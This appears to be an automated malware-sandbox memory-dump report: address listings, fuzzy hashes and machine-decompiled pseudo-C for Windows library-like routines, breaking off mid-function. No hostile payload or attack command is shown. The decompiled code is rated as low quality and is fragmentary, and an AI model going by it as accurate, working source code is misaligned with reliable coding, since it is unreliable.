0x05034d7c
0x05034d7e
0x05034d84
0x05034d89
0x05034d8c
0x05034d8d
0x05034d92
0x05034d95
0x05034d96
0x05034d98
0x05034d9a
0x05034d9f
0x05034da4
0x05034da6
0x05034da8
0x05034daf
0x05034db1
0x05034db1
0x05034daf
0x05034da6
0x05034d84
0x05034d7c
0x00000000
0x05034d74
0x04ff04d6
0x05034de1
0x04ff04dc
0x04ff04dc
0x04ff04dc
0x04ff04e4
0x05034deb
0x05034df1
0x05034df8
0x05034dfe
0x05034e03
0x05034e05
0x05034e17
0x05034e07
0x05034e10
0x05034e10
0x05034e1c
0x05034e1f
0x05034e35
0x05034e35
0x05034e1f
0x05034df8
0x04ff04f1
0x04ff04fa
0x05034e3f
0x05034e47
0x05034e5b
0x05034e61
0x05034e67
0x05034e69
0x05034e71
0x05034e73
0x04ff0500
0x04ff0500
0x04ff0500
0x04ff04fa
0x04ff0508
0x04ff051d
0x04ff051d
0x04ff051f
0x04ff0524
0x00000000
0x04ff0524
0x04ff0515
0x04ff0517
0x05034e7a
0x05034e7c
0x00000000
0x00000000
0x05034e85
0x00000000
0x05034e85
0x00000000
0x04ff0517

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf8f710448aca88e542964b53e25fe4a1f15960a57e8816cf75e46713f63939f
Instruction ID: c6c7f38786a50cee69b2993604a99af9fa5cb489eac4f8947c9571a6388f349f
Opcode Fuzzy Hash: bf8f710448aca88e542964b53e25fe4a1f15960a57e8816cf75e46713f63939f
Instruction Fuzzy Hash: F491F531F046149FEF319A68DC49BBE7BE9EF01714F050265EA11AB2E2DB74AD42C781

Uniqueness

Uniqueness Score: -1.00%

Function 04FCC600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04FCC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x50bd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E04FD6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0500B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x50b7b9c; // 0x0
					_t74 = L04FE4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E05009650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L04FE77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0500F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E050013C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L04FE77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E05009650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x04fcc608
0x04fcc615
0x04fcc625
0x04fcc62d
0x04fcc635
0x04fcc640
0x04fcc680
0x04fcc687
0x04fcc688
0x04fcc689
0x04fcc694
0x04fcc694
0x04fcc642
0x04fcc64a
0x04fcc697
0x05037a25
0x05037a2b
0x05037a2e
0x05037a30
0x05037bea
0x05037bea
0x00000000
0x05037bea
0x05037a36
0x05037a43
0x05037a48
0x05037a4c
0x05037a4e
0x00000000
0x00000000
0x05037a58
0x05037a5a
0x05037a5b
0x05037a5c
0x05037a5d
0x05037a63
0x05037a64
0x05037a6a
0x05037a6c
0x05037a6e
0x050379cb
0x050379cb
0x050379ce
0x050379d0
0x05037a98
0x05037a9b
0x05037a9b
0x05037a9e
0x05037aa1
0x05037bbe
0x05037bbe
0x05037bc0
0x05037be0
0x05037be0
0x05037a01
0x05037a01
0x05037a05
0x05037a07
0x05037a15
0x05037a15
0x05037a1a
0x00000000
0x05037a1a
0x05037bc2
0x05037bc6
0x05037bc9
0x05037bcd
0x05037bcf
0x050379e6
0x050379e6
0x050379eb
0x050379eb
0x050379ef
0x050379f1
0x00000000
0x00000000
0x050379f3
0x050379f5
0x050379ff
0x050379ff
0x00000000
0x050379ff
0x050379f7
0x050379fd
0x00000000
0x00000000
0x00000000
0x050379fd
0x05037bd5
0x05037bd8
0x00000000
0x00000000
0x05037ba9
0x05037bac
0x05037bb0
0x05037bb1
0x05037bb1
0x05037bb6
0x00000000
0x05037bb6
0x05037aa7
0x05037aaa
0x00000000
0x00000000
0x05037ab2
0x05037ab3
0x05037ab5
0x05037aec
0x05037aef
0x05037b25
0x05037b28
0x05037b62
0x05037b64
0x05037b8f
0x05037b92
0x05037b96
0x05037b98
0x00000000
0x00000000
0x05037b9e
0x05037b9f
0x05037ba3
0x00000000
0x05037ba3
0x05037b66
0x05037b68
0x05037ae2
0x05037ae2
0x00000000
0x05037ae2
0x05037b6e
0x05037b72
0x05037b75
0x05037b81
0x05037b85
0x05037b87
0x00000000
0x00000000
0x05037b31
0x05037b34
0x05037b3c
0x05037b45
0x05037b46
0x05037b4f
0x05037b51
0x05037b57
0x05037b59
0x05037b59
0x00000000
0x05037b59
0x05037b77
0x00000000
0x05037b77
0x05037b2a
0x00000000
0x05037b2a
0x05037af1
0x05037af3
0x00000000
0x00000000
0x05037afb
0x05037afc
0x05037afe
0x00000000
0x00000000
0x05037b00
0x05037b03
0x00000000
0x00000000
0x05037b05
0x05037b09
0x05037b0d
0x05037b0f
0x00000000
0x00000000
0x05037b18
0x05037b1d
0x00000000
0x05037b1d
0x05037ab7
0x05037ab9
0x00000000
0x00000000
0x05037abf
0x05037ac1
0x00000000
0x00000000
0x05037ac3
0x05037ac6
0x00000000
0x00000000
0x05037ac8
0x05037acc
0x05037ad0
0x05037ad2
0x00000000
0x00000000
0x05037adb
0x00000000
0x05037adb
0x050379d6
0x050379d9
0x050379dc
0x05037a91
0x05037a94
0x00000000
0x05037a94
0x050379e2
0x00000000
0x050379e2
0x05037a74
0x05037a7a
0x00000000
0x00000000
0x05037a8a
0x05037a21
0x05037a21
0x00000000
0x05037a21
0x04fcc650
0x04fcc651
0x04fcc656
0x04fcc65c
0x04fcc65d
0x04fcc663
0x04fcc664
0x04fcc66a
0x04fcc66e
0x050379c5
0x050379c7
0x00000000
0x050379c7
0x04fcc67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f478eec2600578a3211cc75ef3aebe83ea55ee318855798d84b46d0b2722a38
Instruction ID: cd53959f0baa0476bf242bdeffa3381381e63cea136e2a8b3e3f83845b34be5f
Opcode Fuzzy Hash: 1f478eec2600578a3211cc75ef3aebe83ea55ee318855798d84b46d0b2722a38
Instruction Fuzzy Hash: 548191B56086419BDB65CF14E882F7EB3EDFB84350F14492AED459B241E330EE41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 05046DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E05046DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L04FE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E05046B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E04FE7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E05009AE0();
					_t87 = L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0504795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0504795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0504795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0504795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L04FE4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E05046B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E05046B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E05046B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E05046B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E04FE7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E05009AE0();
								L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L04FE2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L04FE2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L04FE2400( &_v52);
							}
							if(_v28 >= 0) {
								return L04FE2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x05046dd4
0x05046dde
0x05046de1
0x05046de3
0x05046de6
0x05046de9
0x05046dec
0x05046def
0x05046df2
0x05046df5
0x05046dfe
0x05046e04
0x05046e09
0x05046e0d
0x05046e18
0x05046e1b
0x05046e22
0x05046e2d
0x05046e30
0x05046e36
0x05046e42
0x05046e4d
0x05046e50
0x05046e55
0x05046e5c
0x05046e6e
0x05046e5e
0x05046e67
0x05046e67
0x05046e73
0x05046e74
0x05046e77
0x05046e7c
0x05046e7d
0x05046e8e
0x05046e93
0x05046e9c
0x05046ea8
0x05046eab
0x05046eac
0x05046eb3
0x05046ecd
0x05046edc
0x05046ee2
0x05046ee5
0x05046ef2
0x05046efb
0x05046f01
0x05046f06
0x05046f0b
0x05046f11
0x05046f1a
0x05046f22
0x05046f26
0x05046f26
0x05046f33
0x05046f41
0x05046f44
0x05046f47
0x05046f54
0x05046f65
0x05046f77
0x05046f7c
0x05046f82
0x05046f91
0x05046f99
0x05046fa3
0x05046fae
0x05046fae
0x05046fba
0x05046fbb
0x05046fbc
0x05046fc1
0x05046fc2
0x05046fd3
0x05046fd8
0x05046fd8
0x05046fdf
0x05046fe8
0x05046fee
0x05046fee
0x05046ff5
0x05046ffb
0x05046ffb
0x05047004
0x00000000
0x0504700a
0x05047004
0x05046eb3
0x05046e9c
0x05047015

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 372625e1c57ad4f4278e4ae22a47b40480ffaa18e1f5a89ccc7e7e0df70895fb
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: AE718BB1A00209EFDB11DFA5D984EEEBBF9FF48704F104169E505A7251EB30AA42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0505B8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0505B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x50b7b9c; // 0x0
				_t124 = L04FE4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E05009800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E050095B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E050095D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L04FE77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E05009910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E050095D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x50b7b9c; // 0x0
									_t92 = L04FE4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E05009910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E04FCA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0505E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0505E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E050095B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0505b8d9
0x0505b8e4
0x00000000
0x0505b8e6
0x0505b8f3
0x0505b8f5
0x0505b8f5
0x0505b8f8
0x0505b920
0x0505b924
0x0505b936
0x0505b939
0x0505b93d
0x0505b948
0x0505b9a0
0x0505b9a0
0x0505b9a4
0x0505b9bf
0x0505b9c4
0x0505b9c6
0x0505b9cd
0x0505b9d1
0x0505bad4
0x0505bad8
0x0505bada
0x0505badc
0x0505badc
0x0505badf
0x0505bae0
0x0505bae2
0x0505bae4
0x0505baec
0x0505baee
0x0505baf0
0x0505baf0
0x0505baec
0x0505bafb
0x0505bafc
0x0505bafe
0x0505bb01
0x0505bb01
0x00000000
0x0505bb06
0x0505b9d7
0x0505b9db
0x0505b9db
0x0505b9de
0x0505b9de
0x0505b9e4
0x0505b9e7
0x0505b9ea
0x0505b9ec
0x0505b9ef
0x0505b9f3
0x0505ba1b
0x0505ba1b
0x0505ba23
0x0505ba24
0x0505ba27
0x0505ba2a
0x0505ba2b
0x0505ba2e
0x0505ba30
0x0505ba37
0x0505ba3f
0x0505ba9c
0x0505baa2
0x0505bb13
0x0505bb15
0x0505baae
0x0505baae
0x0505bab3
0x0505bab5
0x0505baba
0x0505bac8
0x0505bac8
0x0505baba
0x0505bacd
0x0505bacf
0x00000000
0x0505bacf
0x0505bb1a
0x00000000
0x0505bb1c
0x0505baa7
0x0505bb11
0x00000000
0x0505bb11
0x0505baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0505ba41
0x0505ba41
0x0505ba41
0x0505ba58
0x0505ba5d
0x0505ba62
0x00000000
0x00000000
0x0505ba64
0x0505ba67
0x0505ba68
0x0505ba69
0x0505ba6c
0x0505ba6f
0x0505ba71
0x0505ba78
0x0505ba80
0x00000000
0x00000000
0x0505ba90
0x0505ba90
0x0505ba97
0x00000000
0x0505ba97
0x0505b9f5
0x0505b9f7
0x0505b9f7
0x0505b9fa
0x0505ba03
0x0505ba07
0x0505ba0c
0x0505ba10
0x0505ba17
0x00000000
0x0505b9f7
0x0505b9a6
0x0505b9a8
0x0505b9af
0x0505b9b3
0x00000000
0x00000000
0x0505b9b9
0x00000000
0x0505b9b9
0x0505b94d
0x0505b98f
0x0505b995
0x0505b999
0x0505b960
0x0505b967
0x0505b968
0x0505b96a
0x00000000
0x0505b96a
0x0505b99b
0x0505b99e
0x00000000
0x00000000
0x00000000
0x0505b99e
0x0505b951
0x0505b954
0x0505b95a
0x0505b95e
0x0505b972
0x0505b979
0x0505b97d
0x0505b97f
0x0505b980
0x0505b982
0x0505b984
0x00000000
0x0505b984
0x00000000
0x0505b926
0x00000000
0x0505b926

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d82de5be0da80feb8f4e6cd651026389f22a5c857b24bd0c8b1806453d11f2e
Instruction ID: 72168b8c4ec2f6e39497f12b2a77b03e5d592356ee1e030dbaaf7ec9868b090d
Opcode Fuzzy Hash: 2d82de5be0da80feb8f4e6cd651026389f22a5c857b24bd0c8b1806453d11f2e
Instruction Fuzzy Hash: 0471BD32200605AFE721DE25E845F6FB7E6FB44720F144928EA568B6E0DBB5F941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04FC52A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04FC52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E04FDEEF0(0x50b79a0);
					_t104 =  *0x50b8210; // 0x3202ba0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E04FDEB70(_t93, 0x50b79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E05009890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E04FDEEF0(0x50b79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E04FDEB70(0, 0x50b79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x3202bad
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E04FFF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E04FDEEF0(0x50b79a0);
									__eflags =  *0x50b8210 - _t104; // 0x3202ba0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
